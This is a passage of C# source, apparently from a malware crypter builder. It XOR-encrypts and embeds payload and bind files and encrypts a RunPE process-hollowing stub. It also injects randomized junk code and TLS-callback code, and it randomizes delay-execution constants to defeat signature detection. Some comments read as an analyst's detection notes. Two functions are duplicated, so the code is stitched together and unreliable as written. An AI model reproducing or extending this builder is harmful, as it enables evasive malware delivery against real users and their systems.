        // Standard output is drained to end-of-stream and then discarded.
        string ignored = compilerOutput.ReadToEnd();
    }
}
/// <summary>Builds the main assembler file via CompileSection using the key "main".</summary>
/// <param name="PE">Build context passed through to CompileSection.</param>
public static void CompileMain(NewPE PE)
{
    const string sectionKey = "main";
    CompileSection(sectionKey, PE);
}
/// <summary>Builds the RunPE section via CompileSection using the key "runpe".</summary>
/// <param name="PE">Build context passed through to CompileSection.</param>
public static void CompileRunPESection(NewPE PE)
{
    const string sectionKey = "runpe";
    CompileSection(sectionKey, PE);
}
/// <summary>Builds the import-data section via CompileSection using the key "idata".</summary>
/// <param name="PE">Build context passed through to CompileSection.</param>
public static void CompileIDataSection(NewPE PE)
{
    const string sectionKey = "idata";
    CompileSection(sectionKey, PE);
}
/// <summary>Builds the text section via CompileSection using the key "text".</summary>
/// <param name="PE">Build context passed through to CompileSection.</param>
public static void CompileTextSection(NewPE PE)
{
    const string sectionKey = "text";
    CompileSection(sectionKey, PE);
}
/// <summary>
/// Encodes the file at <paramref name="PayloadPath"/> with a 16-byte key, Base64-encodes
/// the result, and writes "payload_length.inc", "payload_key.bin" and "payload.bin" to the
/// include directory, replacing existing copies.
/// </summary>
/// <param name="PE">Build context supplying the include directory.</param>
/// <param name="PayloadPath">File whose contents are encoded.</param>
/// <remarks>
/// Analysis note: the raw key is stored beside the Base64 blob, so the original file can
/// be recovered statically once both are located (assuming Xor.EncodeDecodeData is a
/// repeating-key XOR — helper not shown).
/// </remarks>
public static void EncryptAndEncodePayload(NewPE PE, string PayloadPath)
{
    byte[] pKey = new byte[16];
    // Keys.PopulateBuffer is not shown here; presumably fills pKey with random bytes.
    Keys.PopulateBuffer(pKey);
    byte[] pFileBuffer = PayloadPath.ReadBytes();
    // Return value is not captured, so the helper is assumed to transform pFileBuffer in place.
    Xor.EncodeDecodeData(pFileBuffer, pKey);
    pFileBuffer = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pFileBuffer));
    string PayloadLengthInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_length.inc");
    string Format = "PAYLOAD_LENGTH EQU 0x{0}";
    // Length is that of the Base64 text, not of the original file.
    Format = string.Format(Format, pFileBuffer.Length.ToString("X8"));
    if (File.Exists(PayloadLengthInclude))
        File.Delete(PayloadLengthInclude);
    File.WriteAllText(PayloadLengthInclude, Format);
    string PayloadKeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_key.bin");
    string PayloadInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload.bin");
    if (File.Exists(PayloadKeyInclude))
        File.Delete(PayloadKeyInclude);
    if (File.Exists(PayloadInclude))
        File.Delete(PayloadInclude);
    File.WriteAllBytes(PayloadKeyInclude, pKey);
    File.WriteAllBytes(PayloadInclude, pFileBuffer);
}
/// <summary>
/// Rewrites "tls_callback.inc", replacing ";[JUNK_NO_PRESERVE]" lines with a generated
/// filler buffer and appending generated function buffers to ";[JUNK_FUNCS]" lines, then
/// records the assembled size in <paramref name="JCI"/> and writes "payload_address.inc".
/// </summary>
/// <param name="PE">Build context supplying the include directory.</param>
/// <param name="JCI">Receives SIZE_TLS_CALLBACK; its other SIZE_* fields are read for the payload address.</param>
/// <param name="Multiplier">Scales the number of appended functions (3×..5×).</param>
/// <remarks>
/// Analysis note: lengths and counts are drawn from Rand on every build, so this region's
/// bytes and size differ between outputs of the same builder.
/// </remarks>
public void WriteLogicalTrashToTLSCallback(xNewPE PE, ref JunkCodeInfo JCI, int Multiplier)
{
    string TlsCallbackInc = Path.Combine(PE.PeDirectory.IncludeDirectory, "tls_callback.inc");
    // This first measurement is overwritten after the rewrite below before it is read.
    int sizeOfTLS = PEFactory.ComputeArbitrarySize(TlsCallbackInc, PE);
    // Accumulated but never read in this method.
    int size_junk_added = 0;
    string[] tls = TlsCallbackInc.ReadLines();
    for (int i = 0; i < tls.Length; i++)
    {
        if (tls[i].Contains(";[JUNK_NO_PRESERVE]"))
        {
            int len_trash = Rand.Next(0x100, 0x200);
            byte[] trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
            size_junk_added += trash_buffer.Length;
            // The marker line is replaced entirely by the assembler form of the buffer.
            tls[i] = trash_buffer.ToASMBuffer();
            trash_buffer = new byte[0];
            GC.Collect();
        }
        if (tls[i].Contains(";[JUNK_FUNCS]"))
        {
            int xx = Rand.Next(3 * Multiplier, 5 * Multiplier);
            for (int jj = 0; jj < xx; jj++)
            {
                int func_len = Rand.Next(0x100, 0x120);
                byte[] func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x1000);
                // The marker line is kept; each generated buffer is appended after it.
                tls[i] = string.Concat(tls[i], Environment.NewLine, func_buffer.ToASMBuffer(), Environment.NewLine);
            }
        }
    }
    if (File.Exists(TlsCallbackInc))
        File.Delete(TlsCallbackInc);
    TlsCallbackInc.WriteLines(tls);
    sizeOfTLS = PEFactory.ComputeArbitrarySize(TlsCallbackInc, PE);
    JCI.SIZE_TLS_CALLBACK = sizeOfTLS + 3; // prologue;
    string AddrPayloadInc = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_address.inc");
    string Format = "PAYLOAD_ADDRESS EQU 0x{0}";
    // Payload offset = sum of the four generated-region sizes recorded in JCI.
    Format = string.Format(Format, (JCI.SIZE_PRE_EP_FUNCTIONS + JCI.SIZE_TLS_CALLBACK + JCI.SIZE_EP_FUNCTION + JCI.SIZE_POST_EP_FUNCTIONS).ToString("X8"));
    File.WriteAllText(AddrPayloadInc, Format);
    GC.Collect();
}
/// <summary>
/// Encodes the file at <paramref name="BindPath"/> using the key stored at
/// <c>PE.PeDirectory.PayloadKeyIncPath</c>, converts the result to Base64, and writes it
/// as ASCII to <c>PE.PeDirectory.BindIncPath</c>, replacing any existing file.
/// </summary>
/// <param name="PE">Build context supplying the key path and output path.</param>
/// <param name="BindPath">File whose contents are encoded.</param>
/// <remarks>
/// Analysis note: this reuses the main payload's key file, so one recovered key decodes
/// both embedded blobs.
/// </remarks>
public static void EncryptAndEncodeBind(NewPE PE, string BindPath)
{
    byte[] sharedKey = PE.PeDirectory.PayloadKeyIncPath.ReadBytes();
    byte[] content = BindPath.ReadBytes();

    // The helper's return value is unused; content is assumed to be transformed in place.
    Xor.EncodeDecodeData(content, sharedKey);

    ASCIIEncoding ascii = new ASCIIEncoding();
    content = ascii.GetBytes(Convert.ToBase64String(content));

    bool alreadyPresent = File.Exists(PE.PeDirectory.BindIncPath);
    if (alreadyPresent)
    {
        File.Delete(PE.PeDirectory.BindIncPath);
    }

    File.WriteAllBytes(PE.PeDirectory.BindIncPath, content);
}
/// <summary>
/// Returns the first section header in <c>PE.Sections</c> whose Name characters spell
/// exactly <paramref name="Name"/>.
/// </summary>
/// <param name="Name">Section name including the leading dot, e.g. ".text".</param>
/// <param name="PE">Build context owning the section list.</param>
/// <returns>The matching header, or the default value of PE_SECTION_HEADER when none matches.</returns>
public static PE_SECTION_HEADER GetSectionByName(string Name, NewPE PE)
{
    return PE.Sections.FirstOrDefault(candidate => new string(candidate.Name) == Name);
}
/// <summary>
/// Looks up a section header by exact name match against its Name character array.
/// </summary>
/// <param name="Name">Section name including the leading dot, e.g. ".idata".</param>
/// <param name="PE">Build context owning the section list.</param>
/// <returns>The first matching header, or the default value of PE_SECTION_HEADER when none matches.</returns>
public static PE_SECTION_HEADER GetSectionByName(string Name, NewPE PE)
{
    return PE.Sections.FirstOrDefault(header => new string(header.Name) == Name);
}
/// <summary>
/// Computes VirtualSize, VirtualAddress and SizeOfRawData for each section from the sizes
/// of the compiled object files, writes the resulting addresses to
/// "section_addresses.inc", rebuilds every section against them, and stores the updated
/// headers back into <c>PE.Sections</c>.
/// </summary>
/// <param name="PE">Build context supplying object paths, alignments and the section list.</param>
public static void CalculateSectionHeaders(NewPE PE)
{
    // Headers are edited as locals and written back at the end via ReplaceSectionByName
    // (presumably because PE_SECTION_HEADER is a value type — confirm against its declaration).
    PE_SECTION_HEADER shText = GetSectionByName(".text", PE);
    PE_SECTION_HEADER shIData = GetSectionByName(".idata", PE);
    PE_SECTION_HEADER shData = GetSectionByName(".data", PE);
#if TLS
    PE_SECTION_HEADER shTLS = GetSectionByName(".bss", PE);
#endif
    // Section sizes come from the object files produced by an earlier build pass.
    uint sizeOfText = (uint)PE.PeDirectory.TextObjectPath.ReadBytes().Length;
    uint sizeOfIData = (uint)PE.PeDirectory.IDataObjectPath.ReadBytes().Length;
    uint sizeOfData = (uint)PE.PeDirectory.DataObjectPath.ReadBytes().Length;
#if TLS
    uint sizeOfTLS = (uint)PE.PeDirectory.TLSObjectPath.ReadBytes().Length;
#endif
    /* COMPUTE TEXT: first section sits at one SectionAlignment from the image base. */
    shText.VirtualSize = sizeOfText;
    shText.VirtualAddress = PE.NtHeader.OptionalHeader.SectionAlignment;
    shText.SizeOfRawData = ALIGN_UP(sizeOfText, PE.NtHeader.OptionalHeader.FileAlignment);
    shText.PointerToRawData = 0; // left at 0 here for every section
    /* COMPUTE IDATA: each later section follows the previous one, rounded to SectionAlignment. */
    shIData.VirtualSize = sizeOfIData;
    shIData.VirtualAddress = ((shText.VirtualAddress + ALIGN_UP(shText.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
    shIData.SizeOfRawData = ALIGN_UP(sizeOfIData, PE.NtHeader.OptionalHeader.FileAlignment);
    shIData.PointerToRawData = 0;
    /* COMPUTE DATA */
    shData.VirtualSize = sizeOfData;
    shData.VirtualAddress = ((shIData.VirtualAddress + ALIGN_UP(shIData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
    shData.SizeOfRawData = ALIGN_UP(sizeOfData, PE.NtHeader.OptionalHeader.FileAlignment);
    shData.PointerToRawData = 0;
#if TLS
    /* COMPUTE TLS */
    shTLS.VirtualSize = sizeOfTLS;
    shTLS.VirtualAddress = ((shData.VirtualAddress + ALIGN_UP(shData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
    shTLS.SizeOfRawData = ALIGN_UP(sizeOfTLS, PE.NtHeader.OptionalHeader.FileAlignment);
    shTLS.PointerToRawData = 0;
#endif
    string SectionHeadersInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "section_addresses.inc");
    if (File.Exists(SectionHeadersInclude))
        File.Delete(SectionHeadersInclude);
    // One EQU per section address, 8 hex digits each.
#if TLS
    string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n" +
                    "IDATA_SECTION_ADDRESS EQU 0x{1}\n" +
                    "DATA_SECTION_ADDRESS EQU 0x{2}\n" +
                    "TLS_SECTION_ADDRESS EQU 0x{3}\n";
    Format = string.Format(Format, shText.VirtualAddress.ToString("X8"), shIData.VirtualAddress.ToString("X8"), shData.VirtualAddress.ToString("X8"), shTLS.VirtualAddress.ToString("X8"));
#else
    string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n" +
                    "IDATA_SECTION_ADDRESS EQU 0x{1}\n" +
                    "DATA_SECTION_ADDRESS EQU 0x{2}\n";
    Format = string.Format(Format, shText.VirtualAddress.ToString("X8"), shIData.VirtualAddress.ToString("X8"), shData.VirtualAddress.ToString("X8"));
#endif
    File.WriteAllText(SectionHeadersInclude, Format);
    // Rebuild so the sections are assembled against the addresses just written.
    PEFactory.CompileTextSection(PE);
    PEFactory.CompileIDataSection(PE);
    PEFactory.CompileRunPESection(PE);
    PEFactory.CompileDataSection(PE);
#if TLS
    PEFactory.CompileTLSSection(PE);
#endif
    ReplaceSectionByName(".text", shText, PE);
    ReplaceSectionByName(".idata", shIData, PE);
    ReplaceSectionByName(".data", shData, PE);
#if TLS
    ReplaceSectionByName(".bss", shTLS, PE);
#endif
}
/// <summary>
/// Derives each section's VirtualSize, VirtualAddress and SizeOfRawData from the compiled
/// object file sizes, emits "section_addresses.inc", rebuilds all sections, and writes the
/// updated headers back into <c>PE.Sections</c>.
/// </summary>
/// <param name="PE">Build context supplying object paths, alignments and the section list.</param>
public static void CalculateSectionHeaders(NewPE PE)
{
    // Headers are edited as locals and written back at the end via ReplaceSectionByName
    // (presumably because PE_SECTION_HEADER is a value type — confirm against its declaration).
    PE_SECTION_HEADER shText = GetSectionByName(".text", PE);
    PE_SECTION_HEADER shIData = GetSectionByName(".idata", PE);
    PE_SECTION_HEADER shData = GetSectionByName(".data", PE);
#if TLS
    PE_SECTION_HEADER shTLS = GetSectionByName(".bss", PE);
#endif
    // Section sizes come from the object files produced by an earlier build pass.
    uint sizeOfText = (uint)PE.PeDirectory.TextObjectPath.ReadBytes().Length;
    uint sizeOfIData = (uint)PE.PeDirectory.IDataObjectPath.ReadBytes().Length;
    uint sizeOfData = (uint)PE.PeDirectory.DataObjectPath.ReadBytes().Length;
#if TLS
    uint sizeOfTLS = (uint)PE.PeDirectory.TLSObjectPath.ReadBytes().Length;
#endif
    /* COMPUTE TEXT: first section sits at one SectionAlignment from the image base. */
    shText.VirtualSize = sizeOfText;
    shText.VirtualAddress = PE.NtHeader.OptionalHeader.SectionAlignment;
    shText.SizeOfRawData = ALIGN_UP(sizeOfText, PE.NtHeader.OptionalHeader.FileAlignment);
    shText.PointerToRawData = 0; // left at 0 here for every section
    /* COMPUTE IDATA: each later section follows the previous one, rounded to SectionAlignment. */
    shIData.VirtualSize = sizeOfIData;
    shIData.VirtualAddress = ((shText.VirtualAddress + ALIGN_UP(shText.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
    shIData.SizeOfRawData = ALIGN_UP(sizeOfIData, PE.NtHeader.OptionalHeader.FileAlignment);
    shIData.PointerToRawData = 0;
    /* COMPUTE DATA */
    shData.VirtualSize = sizeOfData;
    shData.VirtualAddress = ((shIData.VirtualAddress + ALIGN_UP(shIData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
    shData.SizeOfRawData = ALIGN_UP(sizeOfData, PE.NtHeader.OptionalHeader.FileAlignment);
    shData.PointerToRawData = 0;
#if TLS
    /* COMPUTE TLS */
    shTLS.VirtualSize = sizeOfTLS;
    shTLS.VirtualAddress = ((shData.VirtualAddress + ALIGN_UP(shData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
    shTLS.SizeOfRawData = ALIGN_UP(sizeOfTLS, PE.NtHeader.OptionalHeader.FileAlignment);
    shTLS.PointerToRawData = 0;
#endif
    string SectionHeadersInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "section_addresses.inc");
    if (File.Exists(SectionHeadersInclude))
    {
        File.Delete(SectionHeadersInclude);
    }
    // One EQU per section address, 8 hex digits each.
#if TLS
    string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n"
                    + "IDATA_SECTION_ADDRESS EQU 0x{1}\n"
                    + "DATA_SECTION_ADDRESS EQU 0x{2}\n"
                    + "TLS_SECTION_ADDRESS EQU 0x{3}\n";
    Format = string.Format(Format, shText.VirtualAddress.ToString("X8"), shIData.VirtualAddress.ToString("X8"), shData.VirtualAddress.ToString("X8"), shTLS.VirtualAddress.ToString("X8"));
#else
    string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n"
                    + "IDATA_SECTION_ADDRESS EQU 0x{1}\n"
                    + "DATA_SECTION_ADDRESS EQU 0x{2}\n";
    Format = string.Format(Format, shText.VirtualAddress.ToString("X8"), shIData.VirtualAddress.ToString("X8"), shData.VirtualAddress.ToString("X8"));
#endif
    File.WriteAllText(SectionHeadersInclude, Format);
    // Rebuild so the sections are assembled against the addresses just written.
    PEFactory.CompileTextSection(PE);
    PEFactory.CompileIDataSection(PE);
    PEFactory.CompileRunPESection(PE);
    PEFactory.CompileDataSection(PE);
#if TLS
    PEFactory.CompileTLSSection(PE);
#endif
    ReplaceSectionByName(".text", shText, PE);
    ReplaceSectionByName(".idata", shIData, PE);
    ReplaceSectionByName(".data", shData, PE);
#if TLS
    ReplaceSectionByName(".bss", shTLS, PE);
#endif
}
/// <summary>
/// Emits "tls_callback_offset.inc" with TLS_CALLBACK_OFFSET set to
/// SIZE_PRE_EP_FUNCTIONS + SIZE_EP_FUNCTION (8 hex digits) and rebuilds the data section.
/// </summary>
/// <param name="PE">Build context supplying the include directory and JunkInfo sizes.</param>
/// <remarks>
/// Analysis note: TLS callbacks run before AddressOfEntryPoint, so triage of an image built
/// this way should inspect the TLS directory and its callback, not only the entry point.
/// </remarks>
public static void ConstructTLSCallback(NewPE PE)
{
    string includePath = Path.Combine(PE.PeDirectory.IncludeDirectory, "tls_callback_offset.inc");
    bool stale = File.Exists(includePath);
    if (stale)
    {
        File.Delete(includePath);
    }

    string offsetHex = (PE.JunkInfo.SIZE_PRE_EP_FUNCTIONS + PE.JunkInfo.SIZE_EP_FUNCTION).ToString("X8");
    string line = string.Format("TLS_CALLBACK_OFFSET EQU 0x{0}", offsetHex);

    // The file was just removed, so appending creates it with exactly this content.
    File.AppendAllText(includePath, line);

    // Only the data section is rebuilt; the TLS section rebuild is disabled in the original.
    PEFactory.CompileDataSection(PE);
}
/// <summary>
/// Resolves a section key ("text", "data", "idata", "bss", "runpe", "main") to its source
/// and output paths, removes any previous output, and runs the external assembler in
/// flat-binary mode ("-f bin").
/// </summary>
/// <param name="SectionName">Section key; any other value leaves both paths empty.</param>
/// <param name="_PE">Build context supplying all paths and the compiler location.</param>
private static void CompileSection(string SectionName, NewPE _PE)
{
    string inputFile;
    string outputFile;

    switch (SectionName)
    {
        case "text":
            inputFile = _PE.PeDirectory.TextSectionPath;
            outputFile = _PE.PeDirectory.TextObjectPath;
            break;
        case "data":
            inputFile = _PE.PeDirectory.DataSectionPath;
            outputFile = _PE.PeDirectory.DataObjectPath;
            break;
        case "idata":
            inputFile = _PE.PeDirectory.IDataSectionPath;
            outputFile = _PE.PeDirectory.IDataObjectPath;
            break;
        case "bss":
            inputFile = _PE.PeDirectory.TLSSectionPath;
            outputFile = _PE.PeDirectory.TLSObjectPath;
            break;
        case "runpe":
            inputFile = _PE.PeDirectory.RunPESectionPath;
            outputFile = _PE.PeDirectory.RunPEObjectPath;
            break;
        case "main":
            // "main" assembles the final image: its output is the save path, not an object file.
            inputFile = _PE.PeDirectory.MainPath;
            outputFile = _PE.PeDirectory.SavePath;
            break;
        default:
            inputFile = string.Empty;
            outputFile = string.Empty;
            break;
    }

    bool outputExists = File.Exists(outputFile);
    if (outputExists)
    {
        File.Delete(outputFile);
    }

    string commandLine = String.Format("-i \"{0}/\" -f bin \"{1}\" -o \"{2}\"", _PE.PeDirectory.RootDirectoryPath, inputFile, outputFile);

    ProcessStartInfo assemblerInfo = new ProcessStartInfo();
    assemblerInfo.Arguments = commandLine;
    assemblerInfo.FileName = _PE.PeDirectory.CompilerPath;
    assemblerInfo.RedirectStandardOutput = true;
    assemblerInfo.UseShellExecute = false;

    using (Process assembler = Process.Start(assemblerInfo))
    using (StreamReader outputReader = assembler.StandardOutput)
    {
        // Read stdout to the end; the text itself is not used.
        string unused = outputReader.ReadToEnd();
    }
}
/// <summary>
/// Emits "runpe_length.inc" with RUNPE_CODE_LENGTH set to the RunPE object file's byte
/// length (8 hex digits) and rebuilds the text section.
/// </summary>
/// <param name="PE">Build context supplying the include directory and RunPE object path.</param>
public static void FixDecryptorLoop(NewPE PE)
{
    string includePath = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_length.inc");
    bool stale = File.Exists(includePath);
    if (stale)
    {
        File.Delete(includePath);
    }

    // The constant tells the assembled code how many bytes of the RunPE blob to process.
    string lengthHex = PE.PeDirectory.RunPEObjectPath.ReadBytes().Length.ToString("X8");
    string line = string.Format("RUNPE_CODE_LENGTH EQU 0x{0}", lengthHex);

    File.WriteAllText(includePath, line);
    PEFactory.CompileTextSection(PE);
}
/// <summary>
/// Rewrites the delay-execution include file: the literal placeholder "0x69" is replaced
/// by a random 8-digit hex constant, and ";[JUNK_NO_PRESERVE]" lines are replaced by one
/// generated filler buffer.
/// </summary>
/// <param name="PE">Build context supplying <c>PeDirectory.DelayExecutionIncPath</c>.</param>
/// <param name="bLong">Selects the constant range: 25..50 when false, 17,500,000..30,000,000 when true
/// (upper bounds exclusive if Rand is System.Random).</param>
/// <remarks>
/// Analysis note: the constant is presumably a delay-loop iteration count (inferred from
/// the file name — confirm against the include source). It changes per build, so the loop
/// structure rather than the literal is the stable indicator.
/// </remarks>
public void WriteDelayExecutionTrash(xNewPE PE, bool bLong)
{
    string[] olaf = PE.PeDirectory.DelayExecutionIncPath.ReadLines();
    byte[] trash_buffer;
    // Both branches are identical: the filler length does not depend on bLong.
    if (!bLong)
    {
        int len_trash = Rand.Next(0x100, 0x120);
        trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
    }
    else
    {
        int len_trash = Rand.Next(0x100, 0x120);
        trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
    }
    for (int i = 0; i < olaf.Length; i++)
    {
        if (olaf[i].Contains("0x69"))
        {
            // A fresh random value is drawn for each matching line.
            if (!bLong)
                olaf[i] = olaf[i].Replace("0x69", string.Format("0x{0}", Rand.Next(25, 50).ToString("X8")));
            else
                olaf[i] = olaf[i].Replace("0x69", string.Format("0x{0}", Rand.Next(3500000 * 5, 6000000 * 5).ToString("X8")));
        }
        if (olaf[i].Contains(";[JUNK_NO_PRESERVE]"))
        {
            // Both branches are identical: the same buffer is used for every marker line.
            if (!bLong)
            {
                olaf[i] = trash_buffer.ToASMBuffer();
            }
            else
            {
                olaf[i] = trash_buffer.ToASMBuffer();
            }
        }
    }
    File.Delete(PE.PeDirectory.DelayExecutionIncPath);
    PE.PeDirectory.DelayExecutionIncPath.WriteLines(olaf);
}
/// <summary>
/// Encodes the compiled RunPE object file in place with a 16-byte key, writes the key as
/// an assembler buffer to "runpe_key.inc", and rebuilds the data section.
/// </summary>
/// <param name="PE">Build context supplying the RunPE object path and include directory.</param>
/// <remarks>
/// Analysis note: the key is emitted beside the encoded blob and is presumably assembled
/// into the data section by the rebuild that follows, so the encoded region can be
/// recovered statically once the 16-byte key buffer is found.
/// </remarks>
public static void EncryptCodeAndAddKey(NewPE PE)
{
    byte[] pKey = new byte[16];
    // Keys.PopulateBuffer is not shown here; presumably fills pKey with random bytes.
    Keys.PopulateBuffer(pKey);
    byte[] pRunPE = PE.PeDirectory.RunPEObjectPath.ReadBytes();
    // Return value is not captured, so the helper is assumed to transform pRunPE in place.
    Xor.EncodeDecodeData(pRunPE, pKey);
    if (File.Exists(PE.PeDirectory.RunPEObjectPath))
        File.Delete(PE.PeDirectory.RunPEObjectPath);
    PE.PeDirectory.RunPEObjectPath.WriteFile(pRunPE);
    string KeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_key.inc");
    string Format = pKey.ToASMBuffer();
    if (File.Exists(KeyInclude))
        File.Delete(KeyInclude);
    File.WriteAllText(KeyInclude, Format);
    PEFactory.CompileDataSection(PE);
}
/// <summary>
/// Inserts generated filler buffers into the text-section source ahead of the
/// ";[PRE_EP_FUNCTIONS]", ";[EP_FUNCTION]" and ";[POST_EP_FUNCTIONS]" markers, records the
/// bytes inserted per region in <paramref name="JCI"/>, and rewrites the file as ASCII.
/// </summary>
/// <param name="PE">Build context supplying <c>PeDirectory.TextSectionPath</c>.</param>
/// <param name="JCI">Receives SIZE_PRE_EP_FUNCTIONS, SIZE_EP_FUNCTION and SIZE_POST_EP_FUNCTIONS.</param>
/// <param name="Multiplier">Scales the number of buffers inserted before and after the entry point (5×..10× each).</param>
/// <remarks>
/// Analysis note: counts, lengths and generator choice are drawn from Rand on each build,
/// so the bytes around the real entry-point logic differ in size and content between
/// outputs; hashes or fixed offsets taken from one sample will not carry over to another.
/// </remarks>
public void WriteLogicalFunctionsToTextSection(xNewPE PE, ref JunkCodeInfo JCI, int Multiplier)
{
    string TxtSect = PE.PeDirectory.TextSectionPath.ReadText();
    int size_pre_ep = 0;
    int size_ep = 0;
    int size_post_ep = 0;
    int pre_ep_func_cnt = Rand.Next(5 * Multiplier, 10 * Multiplier);
    int post_ep_func_cnt = Rand.Next(5 * Multiplier, 10 * Multiplier);
    // Region before the entry point.
    for (int i = 0; i < pre_ep_func_cnt; i++)
    {
        // Inserting at the marker's index leaves the marker in place after the new text,
        // so each iteration finds it again.
        int index_of = TxtSect.IndexOf(";[PRE_EP_FUNCTIONS]");
        if (index_of > -1)
        {
            int func_len = Rand.Next(0x120, 0x200);
            byte[] func_buffer;
            // Roughly half the buffers come from DataConstructor, the rest from GenerateLogicalFunction.
            if (Rand.NextDouble() >= 0.5)
                func_buffer = new DataConstructor().GenData(func_len, func_len);
            else
                func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
            // (Disabled in the original: entropy printout and zero padding after each buffer.)
            TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
            size_pre_ep += func_buffer.Length;
        }
    }
    JCI.SIZE_PRE_EP_FUNCTIONS = size_pre_ep;
    // Entry-point region: a single generated buffer.
    {
        int index_of = TxtSect.IndexOf(";[EP_FUNCTION]");
        if (index_of > -1)
        {
            int func_len = Rand.Next(0x120, 0x140);
            byte[] func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
            // (Disabled in the original: zero padding after the buffer.)
            TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
            size_ep += func_buffer.Length;
        }
    }
    JCI.SIZE_EP_FUNCTION = size_ep;
    // Region after the entry point; same scheme as the first loop.
    for (int i = 0; i < post_ep_func_cnt; i++)
    {
        int index_of = TxtSect.IndexOf(";[POST_EP_FUNCTIONS]");
        if (index_of > -1)
        {
            int func_len = Rand.Next(0x120, 0x200);
            byte[] func_buffer;
            if (Rand.NextDouble() >= 0.5)
                func_buffer = new DataConstructor().GenData(func_len, func_len);
            else
                func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
            // (Disabled in the original: entropy printout and zero padding after each buffer.)
            TxtSect = TxtSect.Insert(index_of, func_buffer.ToASMBuffer() + Environment.NewLine);
            size_post_ep += func_buffer.Length;
        }
    }
    JCI.SIZE_POST_EP_FUNCTIONS = size_post_ep;
    // (Disabled in the original: a zero-filled "zerofill.bin" entropy pad and SIZE_ENTROPY_PAD.)
    if (File.Exists(PE.PeDirectory.TextSectionPath))
        File.Delete(PE.PeDirectory.TextSectionPath);
    PE.PeDirectory.TextSectionPath.WriteText(TxtSect, StringEncoding.ASCII);
    GC.Collect();
}